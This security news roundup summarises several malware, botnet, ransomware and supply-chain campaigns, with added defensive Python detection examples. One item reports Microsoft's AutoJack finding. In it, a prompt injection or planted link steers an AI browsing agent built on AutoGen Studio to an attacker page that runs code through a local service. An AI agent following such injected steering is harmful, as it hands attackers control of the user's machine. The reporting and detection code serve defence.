Kaspersky is tracking an active campaign that spreads through WhatsApp by hijacking real accounts and sending their contacts a script file disguised as a business or financial document, with no accompanying message. If a Windows user opens it, the script disables User Account Control protections and silently installs ManageEngine Endpoint Central, a legitimate IT remote-management tool, configured to connect to attacker servers and hand them remote control of the machine. Using trusted contacts and signed, legitimate software helps the attack slip past suspicion and many security tools. The campaign spans several countries, with most confirmed victims in Malaysia, and how the WhatsApp accounts are compromised is still unknown.
Elastic Security Labs detailed OXLOADER, a previously undocumented Windows loader that reaches victims through malicious Google Ads impersonating the Node.js download page and other developer tools. A developer searching for Node.js clicks a sponsored result, lands on a convincing fake site, and runs a script that quietly installs the loader, which then deploys an in-memory infostealer called CastleStealer to harvest credentials and other data. OXLOADER is heavily obfuscated, runs several anti-analysis checks, and skips machines set to Russian or in Russian-aligned regions, pointing to a financially motivated Russian-speaking operator. Google removed the advertiser account, but the technique of buying ads against developer searches remains widespread.
Researchers at XLab have documented a previously unknown botnet called AryStinger that has taken over more than 4,000 outdated routers, mostly D-Link DIR-850L and DIR-818LW models, and turned them into proxies for malicious traffic. It spreads by exploiting old, unpatched vulnerabilities and can scan networks, tunnel and proxy traffic, run commands, and tamper with DNS settings to hijack users' browsing. A more advanced Go-based variant targets NAS devices and adds internal network reconnaissance using open-source pentest tools. Infections cluster in South Korea and China but reach Sweden and Southeast Asia too. The compromised devices are end-of-life and will not receive fixes.
Researchers at ThreatDown have detailed a new ransomware operation called Prinz Eugen that breaks from convention in two ways: it prioritizes recently modified files for encryption, hitting the data victims most likely still need, and it leaves no ransom note on the system. The operators break in manually using stolen RDP credentials, deploy remote management tools, steal data for double extortion, and encrypt with a modern cipher combination. At least five victims have been identified, including South Africa's Standard Bank, where the attacker demanded one bitcoin and was refused. The lack of a ransom note can delay detection and complicate incident response.
Microsoft researchers detailed AutoJack, an attack that turns an AI browsing agent into a route for running code on the user's machine. If the agent is steered to open an attacker's web page, that page's JavaScript can reach a privileged local service on the same host and spawn a process, with no credentials and no further interaction once the page loads. A planted link, poisoned URL field, or prompt injection is enough to trigger it. The demonstrated flaw sits in AutoGen Studio, the prototyping interface for Microsoft's AutoGen agent framework. The lesson: once an agent browses the open web and can reach local services, localhost is no longer a trust boundary.
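The check a localhost-bound service should run before acting on any request, shown as an added example (not AutoGen Studio's code). The header names are standard HTTP; the port 8081, the allowed origins and the per-launch token are assumptions for illustration:

```python
"""Request validation for a service bound to localhost.

Added example, not AutoGen Studio's code. Header names are standard HTTP;
the port, the allowed origins and the session token are assumptions.
"""
import hmac
from typing import Mapping, Tuple

# Assumption: the service listens on 127.0.0.1:8081 and its own UI is served from there.
ALLOWED_HOSTS = {"localhost:8081", "127.0.0.1:8081"}
ALLOWED_ORIGINS = {"http://localhost:8081", "http://127.0.0.1:8081"}
# Assumption: a secret generated at launch and handed to the UI out of band,
# e.g. in the URL printed to the terminal; never a fixed string in production.
SESSION_TOKEN = "example-per-launch-secret"


def is_request_allowed(headers: Mapping[str, str], method: str) -> Tuple[bool, str]:
    """Return (allowed, reason) for one incoming request.

    A service that skips all three checks will run whatever a web page sends
    it: the browser issues the request even when the page cannot read the
    response, so "only reachable on localhost" is not a boundary once a
    browser (or a browsing agent) on the same host visits an attacker's page.
    """
    h = {k.lower(): v for k, v in headers.items()}

    # 1. Host must name the local listener. This defeats DNS rebinding, where
    #    attacker.example resolves to 127.0.0.1 after the page loads and the
    #    browser sends "Host: attacker.example" with no Origin on a plain GET.
    if h.get("host") not in ALLOWED_HOSTS:
        return False, "host not local"

    # 2. Browsers attach Origin to cross-site requests. Anything off the
    #    allow-list is a foreign page trying to drive the service.
    origin = h.get("origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, "cross-origin"

    # 3. State-changing methods need a credential a web page cannot guess.
    #    Constant-time comparison so the check itself does not leak the token.
    if method.upper() != "GET":
        presented = h.get("authorization", "")
        expected = f"Bearer {SESSION_TOKEN}"
        if not hmac.compare_digest(presented.encode(), expected.encode()):
            return False, "missing or wrong token"

    return True, "ok"
```

The order matters: the Host check catches requests that carry no Origin at all, the Origin check catches ordinary cross-site calls, and the token is what stops anything that gets past both, since the same-origin policy only restricts what a page can read back, never whether the request is sent.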
A new extortion group called Icarus stole Salesforce CRM data from multiple organizations by abusing Klue, a competitive-intelligence app that integrates with Salesforce. Attackers compromised Klue's backend through a dormant credential, pushed a malicious update that harvested customers' OAuth tokens, and used those tokens to run automated queries against Salesforce's API, exfiltrating contacts, sales communications, and account data over about a day. Salesforce has disabled the Klue Battlecards integration. It is the same OAuth-abuse playbook seen in the Salesloft Drift and Gainsight incidents, exploiting trusted third-party integrations that carry broad, lightly monitored access. Researchers expect more such attacks through 2026.
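A detection pass of the kind that would surface this token abuse, written as an added example rather than anything Salesforce or Klue ships. The log records are constructed, and the signals (an app unseen before, an app querying an object it never touched, and a burst of rows far above its own baseline) are heuristics chosen here, not a documented rule:

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple

# One API-access record: (when, connected app, object queried, rows returned).
Event = Tuple[datetime, str, str, int]


def ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed log. "ci-integration" reads a few Account rows each morning, then
# at 02:10 starts sweeping Contact and EmailMessage thousands of rows at a time.
SAMPLE_LOG: List[Event] = [
    (ts("2026-06-01T09:00:00"), "ci-integration", "Account", 40),
    (ts("2026-06-02T09:05:00"), "ci-integration", "Account", 35),
    (ts("2026-06-03T09:02:00"), "ci-integration", "Account", 42),
    (ts("2026-06-04T02:10:00"), "ci-integration", "Contact", 2000),
    (ts("2026-06-04T02:12:00"), "ci-integration", "EmailMessage", 2000),
    (ts("2026-06-04T02:15:00"), "ci-integration", "Contact", 2000),
    (ts("2026-06-04T02:18:00"), "ci-integration", "Account", 2000),
    (ts("2026-06-04T09:00:00"), "crm-sync", "Account", 50),
]
BASELINE_UNTIL = ts("2026-06-04T00:00:00")   # everything before this trains the baseline


def detect_token_abuse(
    log: List[Event],
    baseline_until: datetime,
    window: timedelta = timedelta(hours=1),
    volume_factor: int = 10,
    min_rows: int = 500,
) -> List[Tuple[datetime, str, str]]:
    """Return (when, app, reason) findings for records at or after baseline_until.

    Baseline per app = the objects it queried and its busiest day's row count
    before baseline_until. Afterwards, flag: an app absent from the baseline;
    an object the app never queried; and rows in any `window` exceeding
    max(min_rows, volume_factor x busiest baseline day), once per burst.
    """
    log = sorted(log)
    seen_objects: Dict[str, Set[str]] = defaultdict(set)
    daily_rows: Dict[str, Dict] = defaultdict(lambda: defaultdict(int))
    for when, app, obj, rows in log:
        if when < baseline_until:
            seen_objects[app].add(obj)
            daily_rows[app][when.date()] += rows
    busiest_day = {app: max(d.values()) for app, d in daily_rows.items()}

    findings: List[Tuple[datetime, str, str]] = []
    recent: Dict[str, deque] = defaultdict(deque)   # per-app sliding window
    volume_alerted: Set[str] = set()
    unknown_alerted: Set[str] = set()

    for when, app, obj, rows in log:
        if when < baseline_until:
            continue
        if app not in seen_objects:
            if app not in unknown_alerted:
                findings.append((when, app, "app absent from baseline"))
                unknown_alerted.add(app)
        elif obj not in seen_objects[app]:
            findings.append((when, app, f"new object {obj}"))
            seen_objects[app].add(obj)            # report each new object once

        q = recent[app]
        q.append((when, rows))
        while q and when - q[0][0] > window:
            q.popleft()
        total = sum(r for _, r in q)
        limit = max(min_rows, volume_factor * busiest_day.get(app, 0))
        if total > limit and app not in volume_alerted:
            findings.append((when, app, f"{total} rows within {window}"))
            volume_alerted.add(app)
        elif total <= limit:
            volume_alerted.discard(app)            # burst over, re-arm
    return findings
```

The point of keying everything on the connected app rather than the user is that a stolen OAuth token acts under a real user's identity; what changes is the integration's behaviour, which is why integrations need their own baselines.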
Microsoft has detailed a cryptocurrency-stealing campaign, active since February, that spreads through USB drives and hides its command channel inside the Tor network. Infection starts when someone opens a malicious Windows shortcut on a USB stick; the malware then hides real documents and replaces them with lookalike shortcuts, copies itself to other drives, and sets scheduled tasks for persistence. Its clipper component watches the clipboard about twice a second, swapping copied wallet addresses for the attacker's and grabbing seed phrases and private keys, which it sends out over a bundled Tor client. It can also run attacker-supplied code, doubling as a lightweight backdoor.
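Detection logic for the clipboard swap described above, written as an added example; it is not Microsoft's analysis code and it does not read a live clipboard. The snapshots are constructed, and the address patterns are deliberately loose classifiers (prefix and length only, no checksum):

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Loose classifiers: prefix and length only, no checksum. Assumption: adequate
# to tell "wallet address" from other text for detection purposes.
ADDRESS_PATTERNS = {
    "btc": re.compile(r"^(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-z02-9]{11,71})$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def classify(text: str) -> Optional[str]:
    """Return the address family the clipboard text looks like, or None."""
    s = text.strip()
    for family, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(s):
            return family
    return None


@dataclass
class Snapshot:
    t: float        # seconds since the monitor started
    content: str


@dataclass
class Swap:
    t: float
    family: str
    original: str
    replaced_with: str


def find_swaps(snapshots: List[Snapshot], max_gap: float = 1.0) -> List[Swap]:
    """Flag an address rewritten into a different address of the same family within max_gap seconds.

    A person re-copying a second address takes longer than that; a clipper
    polling twice a second rewrites the clipboard almost as soon as it changes.
    """
    swaps: List[Swap] = []
    prev: Optional[Snapshot] = None
    for cur in snapshots:
        if prev is not None:
            before, after = prev.content.strip(), cur.content.strip()
            family = classify(before)
            if (family is not None and classify(after) == family
                    and before != after and 0.0 <= cur.t - prev.t <= max_gap):
                swaps.append(Swap(cur.t, family, before, after))
        prev = cur
    return swaps


# Constructed snapshots: the user copies an ETH address at t=10.0 and it has been
# rewritten by t=10.4; later the user copies two BTC addresses 15 s apart (benign).
SAMPLE_SNAPSHOTS = [
    Snapshot(0.0, "meeting notes"),
    Snapshot(10.0, "0x" + "ab" * 20),
    Snapshot(10.4, "0x" + "cd" * 20),
    Snapshot(25.0, "0x" + "cd" * 20),
    Snapshot(40.0, "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"),
    Snapshot(55.0, "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq"),
]
```

Fed live snapshots from a poller at the malware's own cadence, the check surfaces the swap within a second; run over a monitor's log after the fact, it tells an incident responder which addresses were substituted and when.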
Attackers compromised the build pipeline of ShapedPlugin, a WordPress plugin maker, and slipped malware into legitimate updates delivered to paying customers through the vendor's own update system. The tainted releases install a fake plugin that impersonates WooCommerce components, steals site credentials, and gives attackers the ability to write files remotely. Three paid plugins are affected: Product Slider Pro for WooCommerce, Real Testimonials Pro, and Smart Post Show Pro. The backdoor was injected into Pro builds on May 21, with the first customer reports on June 10. Versions on WordPress.org stayed clean, pointing to a compromise of the vendor's build and release infrastructure rather than of the plugin code itself.
A newly surfaced dataset dubbed FortiBleed exposes what appear to be Fortinet and FortiGate VPN credentials tied to 73,932 firewall URLs at organizations around the world. Separately, researchers at SOCRadar report roughly 30,000 compromised Fortinet firewalls exposing networks to attack. Exposed VPN credentials are a direct route into corporate networks, letting attackers log in as legitimate users, bypass perimeter defenses, and stage ransomware or data theft. Fortinet gear is a perennial target, with many of these exposures stemming from past unpatched flaws and credential harvesting. Organizations cannot assume old Fortinet credentials are safe just because devices were later patched.
Aikido Security uncovered a coordinated campaign of at least 15 malicious plugins on the JetBrains Marketplace that pose as AI coding assistants but secretly steal the AI provider API keys developers enter. The plugins offer real features like chat, code review, and commit messages, so they work as advertised, but the moment a user pastes in an OpenAI, DeepSeek, or SiliconFlow key and clicks Apply, the key is silently sent to an attacker server over plain HTTP, with no prompt. The campaign has run since late October 2025, with new plugins as recent as June 10, and uses inflated downloads and fake reviews. Separately, malicious Chrome extensions were found capturing chatbot conversations.
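What a proxy or endpoint rule for this behaviour looks like, as an added example (not Aikido's code). The captures are constructed; the `sk-` key shape and the list of hosts such a key may legitimately be sent to are assumptions:

```python
import re
from typing import Dict, List

# Assumption: OpenAI, DeepSeek and SiliconFlow keys all begin with "sk-"; one loose pattern covers them.
KEY_PATTERN = re.compile(r"\bsk-[A-Za-z0-9_\-]{16,}")
# Assumption: the only hosts a key of that shape should ever be sent to.
EXPECTED_HOSTS = {"api.openai.com", "api.deepseek.com", "api.siliconflow.cn"}


def parse_http_request(raw: str) -> Dict[str, object]:
    """Split a raw HTTP/1.1 request into method, target, lowercase-keyed headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def find_key_exfil(captures: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Flag every request carrying an API key over plaintext HTTP or to an unexpected host.

    Each capture is {"tls": bool, "raw": str}. Whether the connection was TLS has
    to come from the capture layer: the request bytes look the same either way.
    """
    findings = []
    for cap in captures:
        req = parse_http_request(cap["raw"])
        headers = req["headers"]
        host = headers.get("host", "").split(":")[0]
        haystack = "\n".join(headers.values()) + "\n" + req["body"]
        for key in sorted(set(KEY_PATTERN.findall(haystack))):
            reasons = []
            if not cap["tls"]:
                reasons.append("plaintext HTTP")
            if host not in EXPECTED_HOSTS:
                reasons.append(f"unexpected host {host}")
            if reasons:
                findings.append({"host": host, "target": req["target"],
                                 "key_prefix": key[:6] + "...", "reasons": reasons})
    return findings


DEMO_KEY = "sk-" + "A1b2" * 6   # constructed, not a real key

# Constructed captures: the plugin's exfil POST, a legitimate API call, and a "telemetry" leak over TLS.
SAMPLE_CAPTURES = [
    {"tls": False, "raw": (
        "POST /collect HTTP/1.1\r\nHost: collector.example\r\nContent-Type: application/json\r\n\r\n"
        '{"provider": "openai", "key": "' + DEMO_KEY + '"}')},
    {"tls": True, "raw": (
        "POST /v1/chat/completions HTTP/1.1\r\nHost: api.openai.com\r\nAuthorization: Bearer " + DEMO_KEY + "\r\n\r\n"
        '{"model": "example", "messages": []}')},
    {"tls": True, "raw": (
        "GET /ping HTTP/1.1\r\nHost: telemetry.example\r\nX-Api-Key: " + DEMO_KEY + "\r\n\r\n")},
]
```

The host check is the one that keeps working after an operator fixes the obvious mistake and moves the collector to HTTPS; a key that leaves the machine for anywhere other than its provider is the signal, the transport is incidental.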